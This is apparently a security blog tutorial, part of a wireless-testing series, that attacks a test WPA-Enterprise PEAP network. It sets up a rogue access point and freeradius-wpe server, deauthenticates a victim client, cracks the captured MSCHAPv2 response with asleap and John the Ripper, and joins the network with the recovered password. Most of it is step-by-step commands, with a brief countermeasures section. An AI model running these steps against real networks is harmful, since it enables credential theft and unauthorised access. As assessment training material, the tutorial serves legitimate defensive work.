By Tony Lee
Introduction
In our previous articles we used TP-Link’s TL-WN722N and a Kali Virtual Machine (VM) to perform wireless discovery and attack against a Wired Equivalent Privacy (WEP) network, WPA (Pre-Shared Key) PSK network, a network hiding its SSID, a MAC filtering network, and our first round of WPA-Enterprise networks (LEAP and EAP-MD5) to showcase the abilities of this inexpensive and flexible setup.
In this article we will complete our tests by attacking a test WPA-Enterprise network that uses Protected EAP (PEAP).
Figure 1: Our setup
Consult our previous article WEP for the following topics as they are omitted from this article due to similarity:
Outline
Preparation
WPA-Enterprise Refresher
Discovery
Attack
PEAP and EAP-TLS Explained
Install the Software
freeradius-server-2.1.12
freeradius-wpe patch
hostapd v2.0
Start the RADIUS Server
Start the Fake AP
Deauthenticate the Client
Brute-force the Credentials
Connect
Countermeasures
Conclusion
Preparation
NetworkManager (included in the default Kali Linux) can cause problems when trying to complete simple tasks such as connecting to wireless networks. To prevent any interference, we will disable it ahead of time.
root@kali:~# service network-manager stop
[ ok ] Stopping network connection manager: NetworkManager.
|
WPA-Enterprise Refresher
We already looked at breaking WEP and WPA-PSK networks in previous articles and mentioned that the danger in using these wireless standards is that there is a shared static key that should be changed every time someone with knowledge of the key leaves the company. After all, you wouldn’t want an ex-employee still being able to connect to the network after their departure--would you? This is a security issue in any company that has regular turn over. So what is the alternative? WPA-Enterprise of course!
WPA-Enterprise is ideal for large organizations because it does not use a single shared key in which all users use to connect to the wireless network. Each user has their own account (usually username and password) that they use to authenticate to the network. Best of all these accounts can be centrally authenticated and managed--even linked into existing account repositories such as Active Directory or LDAP. When an employee leaves the company and their account is terminated in Active Directory, it would also be terminated from the wireless if authentication is passed through.
The other unique WPA-Enterprise attribute is its use of Extensible Authentication Protocols (EAPs). This allows multiple implementations and increased flexibility for corporations. This flexibility is a double edge sword though as not all EAP types are created equal (in terms of security or ease of deployment). We discussed LEAP and EAP-MD5 in the previous article. The EAP types we will discuss in this article are bolded below (feel free to skip non-bolded as they are present to be complete):
Discovery (kismet)
In previous articles, we used iwlist, airodump-ng, and Kismet to discover wireless networks. This is also the case here. Take a look below at the information that iwlist provides.
root@kali:~# iwlist wlan1 scanning | grep -A 30 CorpNetwork
ESSID:"CorpNetwork"
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s
Mode:Master
Extra:tsf=000000000d674180
Extra: Last beacon: 96ms ago
IE: Unknown: 000B436F72704E6574776F726B
IE: Unknown: 010482840B16
IE: Unknown: 030101
IE: IEEE 802.11i/WPA2 Version 1
Group Cipher : TKIP
Pairwise Ciphers (2) : CCMP TKIP
Authentication Suites (1) : 802.1x
--snip--
|
Even though these three tools can identify WPA-Enterprise networks, none of them can tell you the EAP type. For this we use Wireshark to inspect the packets. Let’s capture some traffic with airodump-ng and inspect it with Wireshark, but first we want to place the wireless card into “Monitor” mode.
root@kali:~# airmon-ng start wlan0
|
We first use airodump-ng without any options in order to discover the network we want to examine and its details. After we are obtain this information, we focus our collection efforts by locking onto the channel and AP.
Syntax:
airodump-ng -c <CHANNEL> --bssid <APMAC> -w <FILE PREFIX> <INT>
Key:
-c = Channel that the AP is on
--bssid = MAC address of the AP
-w = Prefix of the file name that you want to write data to
<INT> = Interface we will be capturing on
Attack:
airodump-ng --bssid A0:F3:C1:0C:B6:46 -c 1 -w mysteryEAP mon0
|
Figure 2: airodump-ng is detecting wireless networks
From this screenshot, we will note a few items for the attack later:
Variable name = Description: Value
==============================
$ESSID = ESSID: CorpNetwork
$CH = Channel: 1
$AP = AP MAC: A0:F3:C1:0C:B6:46
$VM = Victim user MAC: 24:77:03:8C:D3:44
|
Now that our capture is running, we can inspect the packets with Wireshark. In order to discover the EAP type, we can use Wireshark’s “Statistics -> Protocol Hierarchy” feature. Look for 802.1X Authentication and apply a filter to those selected packets. A shortcut would be to type “eapol” in the display filters.
Figure 3: Wireshark Protocol Hierarchy feature
After applying the filters, we see that the EAP type is Protected EAP (PEAP).
Figure 4: EAP type is PEAP
Attack
Now that discovery is complete and we understand the EAP type, we will examine the attack methodology for PEAP and EAP-TLS.
PEAP and EAP-TLS Explained
Since PEAP and EAP-TLS use a secure tunnel to pass the inner authentication protocol, we will need to create a fake RADIUS server and fake access point and convince the client to connect to our infrastructure. This will be accomplished by having a stronger signal than their access point and then deauthenticating the client so they connect to our AP.
The diagrams below help to illustrate the attack process. In the first image, we see normal operation of a client connected to the access point and the access point passing the authentication on to the RADIUS server.
Figure 5: Normal operation in which client is connected to legitimate network
In the second image, we see a deauth attack followed by the client connecting to the fake access point and an attempt to authenticate to the attackers RADIUS server.
Figure 6: After wireless client is deauthenticated, the client will hopefully connect to our fake access point
This should yield the information necessary to begin a brute force attack of the credentials. Let’s look at the detailed steps that are required in getting this setup in our environment. Our steps taken with this setup are outlined below:
Install the Software
This attack requires a decent amount of software that is not installed by default on the Kali Linux attack image. The software we need is:
We have greatly simplified the download and install of the RADIUS attack service by listing the commands needed below. The freeradius-server-2.1.12 and the patch can be downloaded and applied by copying and pasting the following commands into a terminal as root:
wget ftp://ftp.freeradius.org/pub/radius/old/freeradius-server-2.1.12.tar.bz2
wget https://raw.github.com/brad-anton/freeradius-wpe/master/freeradius-wpe.patch
tar -jxvf freeradius-server-2.1.12.tar.bz2
cd freeradius-server-2.1.12
patch -p1 < ../freeradius-wpe.patch
./configure
make
make install
ldconfig
|
Explanation of the commands above:
The first two wget statements download both the freeradius server and the patch for wpe. The next line decompresses the freeradius-server package. Then we change directories into the decompressed directory and run the patch. Then we compile and install the application.
After running the commands above, test the freeradius server to make sure the patch was applied by running it with the (-v) version option. You should see “FreeRADIUS-WPE” in the banner.
root@kali:~/freeradius-server-2.1.12# radiusd -v
radiusd: FreeRADIUS-WPE Version 2.1.12, for host i686-pc-linux-gnu, built on Jul 29 2013 at 10:34:02
--snip--
|
The version of hostapd that Kali has in its repositories is 1.X--which has a limitation of only being able to negotiate WPA1. If we want to be able to attack WPA2 networks, we need to install hostapd v2.0 from source. We have simplified the installation and troubleshooting of the hostapd service by listing the commands below for your copy and paste pleasure:
wget http://hostap.epitest.fi/releases/hostapd-2.0.tar.gz
tar -zxvf hostapd-2.0.tar.gz
cd hostapd-2.0/
cd hostapd/
cp defconfig .config
apt-get install libnl-dev
apt-get update
apt-get install libssl-dev
make && make install
|
Explanation of the commands above:
The first command obtains the latest source code for hostapd. The next three commands decompress the package and navigate to the proper directory for compilation. We then create a configuration file for compiling. The next three commands grab necessary libraries and finally the last command compiles and installs the binaries.
After all the software is installed, we can start the attack.
Start the RADIUS Server
We can attempt to start the RADIUS server and perform the attack, but there is one configuration change that we needed to make in order to successfully capture credentials from a Windows client using AD pass through authentication.
The file we needed to edit is:
/usr/local/etc/raddb/modules/mschap
We had to make sure the line “with_ntdomain_hack” was set to yes and uncommented as shown below:
# Windows sends us a username in the form of
# DOMAIN\user, but sends the challenge response
# based on only the user portion. This hack
# corrects for that incorrect behavior.
#
with_ntdomain_hack = yes
|
When that line is commented we received the following error message: “Could not recover last 2 bytes of hash from the challenge/response.”
Figure 7: Error message when “with_ntdomain_hack” was not set to yes
Now that we have the configuration file modified, we should be ready to start radiusd.
Syntax:
radiusd -X
Key:
-X = Debugging mode. When trying to understand how the server works, ALWAYS run it with "radiusd -X".
|
The screenshot below shows the expected behavior of running “radiusd -X”. The configuration will flash by and then the screen will hang until there is input from the fake access point that we set up in the next step.
Figure 8: radiusd is ready to process requests
Start the Fake AP
If we want to trick the victim to connect to our setup, we need a fake access point. This can be a hardware based access point, such as the Netgear home router we have been using in the previous articles, or we can create a software access point. Because a software access point is more flexible and portable, we will use the hostapd software AP in this article. The hostapd software requires a configuration file. Feel free to use our example file below to get you started:
interface=wlan0
driver=nl80211
ssid=CorpNetwork
logger_stdout=-1
logger_stdout_level=0
dump_file=/tmp/hostapd.dump
ieee8021x=1
eapol_key_index_workaround=0
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
wpa=2
wpa_key_mgmt=WPA-EAP
channel=1
wpa_pairwise=TKIP CCMP
|
After you have entered the data above in a file called hostapd.conf, run the software and supply the configuration file as shown below:
Syntax:
hostapd <configuration file>
Syntax:
hostapd ./hostapd.conf
|
After running hostapd, your screen should look like the following screenshot:
Figure 9: hostapd will display minimal output after it is ready to receive the first wireless client
Deauthenticate the Client
Now that we have our RADIUS server and fake access point ready to go, we need a client to authenticate to us. We could be patient and wait for any client to connect or reconnect to our AP or we could help speed the process up. Our goal here is to deauthenticate (aka kick a client off the network) so they reconnect to the network. Upon client reauthentication, we will trick them to connect to our fake access point and RADIUS server so they will create the encrypted tunnel with us and pass their inner authentication credentials.
In our example, the victim information found during the discovery phase is summarized below:
Variable name = Description: Value
==============================
$ESSID = ESSID: CorpNetwork
$CH = Channel: 1
$AP = AP MAC: A0:F3:C1:0C:B6:46
$VM = Victim user MAC: 24:77:03:8C:D3:44
|
Now, let’s knock the victim off the wireless network using aireplay’s deauthentication attack.
Syntax:
aireplay-ng -0 25 -a <AP> -c < VICTIM_MAC> <INT>
Key:
-0 = (same as --deauth) deauthentication attack
-a = MAC address of the AP
-c = Victim MAC address
<INT> = Interface we will be attacking from
Attack:
aireplay-ng -0 25 -a $AP -c $VM mon0
|
If the client reconnects to your access point, you will see traffic on both the freeradius-wpe screen as well as the hostapd screen. However, the real goods will be displayed in the freeradius-server-wpe.log file:
root@kali:~# tail -f /usr/local/var/log/radius/freeradius-server-wpe.log
|
The client authentication will fail, but this still provides us with the MSCHAPv2 challenge/response we need to crack the user’s password shown in the next section.
Figure 10: The user’s authentication will fail, but we will have the challenge/response needed to crack the password
Brute-force the Credentials
Since the attack on these WPA-Enterprise inner authentication protocols is an off-line brute-force attack, you will first need a sufficiently large wordlist to supply to the cracking program. The rockyou.com word list is a good start as it is almost 14.5 million passwords. In order to use the rockyou.com wordlist, you will have to uncompress it as shown below:
root@kali:/usr/share/wordlists# ls
rockyou.txt.gz
root@kali:/usr/share/wordlists# gunzip rockyou.txt.gz
root@kali:/usr/share/wordlists# ls
rockyou.txt
root@kali:/usr/share/wordlists# wc -l rockyou.txt
14344392 rockyou.txt
|
MSCHAPv2
Since the inner authentication protocol was MSCHAPv2 in this example, we will use Josh Wright’s asleap tool as shown below. We will supply the challenge (-C), response (-R), and the wordlist (-W):
Syntax:
root@kali:~# asleap
asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
asleap: Must supply an interface with -i, or a stored file with -r
Usage: asleap [options]
-r Read from a libpcap file
-i Interface to capture on
-f Dictionary file with NT hashes
-n Index file for NT hashes
-s Skip the check to make sure authentication was successful
-h Output this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit
-C Challenge value in colon-delimited bytes
-R Response value in colon-delimited bytes
-W ASCII dictionary file (special purpose)
Attack:
root@kali:~# asleap -C 9f:55:58:f3:27:72:12:4e -R 79:bc:55:2e:ef:0d:33:1e:ca:5f:75:93:0d:9e:14:e3:6d:78:9b:f5:61:0a:b8:7b -W /usr/share/wordlists/rockyou.txt
|
The asleap tool is very fast. It found our password of “cheekymonkeyrox” in just seconds because it is present as-is within the rockyou password list.
Figure 11: The challenge/response is used in the asleap tool with a dictionary to recover the password
Keep in mind that passwords are case sensitive and would thus most likely require permutations of passwords as discussed in previous articles. For more complex cracking attempts, it is possible to use John the Ripper (JTR) to perform permutations and make dictionaries larger:
Generate permutations with JTR:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout
Feed JTR permutations into asleap:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | asleap -W - -C <CHALLENGE> -R <RESPONSE>
Example:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | asleap -C 9f:55:58:f3:27:72:12:4e -R 79:bc:55:2e:ef:0d:33:1e:ca:5f:75:93:0d:9e:14:e3:6d:78:9b:f5:61:0a:b8:7b -W -
|
EAP-MD5
If the inner authentication protocol is EAP-MD5 use the eapmd5pass tool:
Syntax:
root@kali:~# eapmd5pass
eapmd5pass - Dictionary attack against EAP-MD5
Usage: eapmd5pass [ -i <int> | -r <pcapfile> ] [ -w wordfile ] [options]
-i <iface> interface name
-r <pcapfile> read from a named libpcap file
-w <wordfile> use wordfile for possible passwords.
-b <bssid> BSSID of target network (default: all)
-U <username> Username of EAP-MD5 user.
-C <chal> EAP-MD5 challenge value.
-R <response> EAP-MD5 response value.
-E <eapid> EAP-MD5 response EAP ID value.
-v increase verbosity level (max 3)
-V version information
-h usage information
The "-r" and "[-U|-C|-R|-E]" options are not meant to be used together. Use -r when a packet capture is available. Specify the username, challenge and response when available through other means.
Attack:
root@kali:~# eapmd5pass -w /usr/share/wordlists/rockyou.txt -r WPAcapture-01.cap
|
For more complex cracking attempts, it is possible to use John the Ripper (JTR) to perform permutations and make dictionaries larger:
Generate permutations with JTR:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout
Feed JTR permutations into eapmd5pass:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | eapmd5pass -w - -r <PCAP>
Example:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | eapmd5pass -w - -r WPAcapture-01.cap
|
Connect
Now that we have recovered the credentials, we will connect to the AP using the configuration files below:
Check the status of the card:
root@kali:~# iwconfig wlan0
Enter the network information:
root@kali:~# iwconfig wlan0 essid "QX3A7"
Bring the Interface up:
root@kali:~# ifconfig wlan0 up
Create wpa_supplicant file:
network={
ssid="CorpNetwork"
scan_ssid=1
key_mgmt=WPA-EAP
eap=PEAP
identity="TonyTestUser"
password="cheekymonkeyrox"
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}
Run the wpa_supplicant:
root@kali:~# wpa_supplicant -i wlan0 -c ~/wpa-psk.conf
Obtain an IP:
root@kali:~# dhclient wlan0
Reloading /etc/samba/smb.conf: smbd only.
Verify an IP is obtained:
root@kali:~# ifconfig wlan0
|
Countermeasures
Even though the intention of this article is not to warn about the dangers of using WPA-Enterprise PEAP or EAP-TLS security, we feel that it is important to note that client settings can be just as important as the EAP type. That said, we perform many wireless assessments in which we discover misconfigured clients that leave themselves open to the attack outlined in this article. When this is the case, we recommend centrally reconfiguring the wireless clients to reflect a more secure configuration. For example, PEAP properties should always validate server certificates, specify RADIUS servers, specify CA’s, and prevent users from overriding any suspicious events. These secure client settings are shown in the screenshot below.
Figure 12: Wireless client settings for PEAP
Conclusion
In this article, we proved the capabilities of an inexpensive wireless adapter and a flexible virtualized wireless attack image by breaking into a WPA-Enterprise PEAP test network. For just $16 and no reboot required you can place a wireless adapter into monitor mode and start assessing wireless networks. More testing needs to be done with this setup to determine other capabilities; however as of right now, it appears that it can provide quick, portable, flexible, and inexpensive wireless testing. Feedback below is always appreciated.
Props
Thomas d'Otreppe for the ever critical aircrack-ng software suite
Josh Wright and Brad Antoniewicz for great work on freeradius-WPE
Josh Wright for asleap and eapmd5pass
Jouni Malinen <j@w1.fi> and contributors for hostapd
Offensive security group for Kali Linux
Dan Dumond for the sanity check and proof read
